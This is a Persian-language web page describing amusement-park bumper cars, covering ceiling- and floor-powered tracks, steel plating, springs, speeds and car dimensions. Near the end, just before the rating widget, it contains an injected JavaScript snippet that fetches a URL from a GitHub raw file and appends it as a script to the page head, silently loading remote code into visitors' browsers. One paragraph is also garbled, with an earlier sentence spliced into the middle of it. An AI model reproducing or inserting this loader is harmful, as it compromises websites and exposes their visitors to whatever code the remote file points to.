خودرو برقی چیست؟

 • ماشین برقی کوبنده یکی از پر طرفدارترین محصولات شهربازی است. این وسیله بازی برای تمامی سنین از کودکان تا بزرگسالان مناسب می باشد محصولات شهربازی بطور کلی به دو دسته ی شهربازی فضای باز و سرپوشیده تقسیم می شود. این تقسیم بندی باعث می شود تا محصولاتی را که نیاز به فونداسیون های عمیق دارند و یا از وزن بالایی برخوردارند نتوان در شهربازی سرپوشیده استفاده کرد.


  ماشین برقی کوبنده از جذاب ترین ماشین برقی کودک است که در اغلب شهربازی های فضای باز و سرپوشیده موجود است. البته فراوانی استفاده از این دستگاه در شهربازی سرپوشیده میباشد.این محصول با نورپردازی ها و حرکت های زیاد نگاه هر بیننده ای را به خود جلب می نماید. همچنین از گستره سنی وسیعی برخوردار است. این محصول در دو دسته ی برق از سقف و برق از کف تقسیم بندی می شود که بر حسب انتخاب و نیاز مشتری اجرا می شود.
  ماشین های کوبنده مناسب کودکان تا بزرگسالان است و به دلیل ایمنی و امنیت و هیجانی که به فرد انتقال میدهد جزء محبوب ترین وسایل شهربازی است. در ادامه انواعابن دستگاه های کوبنده که شامل حرکت با برق از سقف و برق از کف و جوش میباشد آشنا خواهید شد.

  کوبنده  (برق از سقف)

  در این نوع پیست، ماشین ها دارای آنتن هستند و برق کشی پیست از طریق توری در سقف پیست اجرایی می شود. همچنین کف این پیست با ورق ۵ میلی متر کلاف کشیده شده پوشیده می شود.علاوه بر آن برای ایمنی بیشتر برق کشی دور تا دور پیست الزامی است. سرعت هر خودرو بطور میانگین ۸-۱۲ کیلومتر بر ساعت است و ابعاد تقریبی هر ماشین ۲۰۰×۹۰ سانتی متر است که ظرفیتی معادل دونفر را در اختیار کاربر قرار می دهد.

  ماشین برقی کوبنده (برق از کف)

  این نوع خود به دو صورت جوش و پرتابل قابل اجراست. برق مصرفی این پیست از کنتر ذخیره می شود که ۲۲۰ ولت می باشد. چناچه پیست بخواهد در طبقات مجتمع های تجاری نصب و راه اندازی شود حتما باید زیر شاسی کشی های پیست، فنر هایی با قطر ۷ سانتی متر کار شود تا از انتقال ضربه به سقف طبقه پایین جلوگیری شود همچنین این فنر ها وزن صفحات سنگین پیست را تحمل خواهند کرد. توجه داشته باشید که در پیست روباز، اجرای این فنر ها لزومی ندارد. همچنین اگر پیست در فضای باز اجرا می شود بایستی سقف پیست به فاصله ۱۳۰ سانتی متر تا لبه ی پیست پیش روی داشته باشد. در مناطقی مانند شمال کشور که رطوبت هوا بالاست توصیه می شود تا از پیست جوشی با ورق ۶ میلی متر فولاد مبارکه استفاده کنید. زیر سازی این کار بصورت قوطی های آلومینیومی ست که به اندازه ۲۵ سانتی متر در زیر پیست شاسی کشی خواهد شد.

  در این نوع از پیست ماشین کوبنده که در ماشین برقی کوبنده یکی از پر طرفدارترین محصولات شهربازی است. این وسیله بازی برای تمامی سنین از کودکان تا بزرگسالان مناسب صفحات بصورت ۱×۱ و ۲×۱ کنار یک دیگر قرار گرفته و به یک دیگر با جوش وصل می شوند. صفحه رویی آهن می تواند از قطر های ۳میلی متری،۴ میلی متری و ۶میلی متری ساخته شود اما بصورت عمده از قطر ۳میلی متر استفاده می شود. بین دو طرف صفحه نیز چوب ام دی اف به ضخامت ۲۹ یا ۳۲ میلی متر قرار می گیرد.

  این دستگاه ها شهربازی (پرتابل)

  در این نوع از پیست صفحات بصورت یک تکه پیچ و مهره شده و روی زیر ساخت قرار می گیرد.

  این دستگاه کوبنده همیشه میتواند جزء انتخاب های شما برای تفریح سالم و ایمن باشد. همچنین در کنار استفاده در شهربازی و خانه کودک ها که برای کودکان مناسب است میتوانید از شهربازی لذت ببرید.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید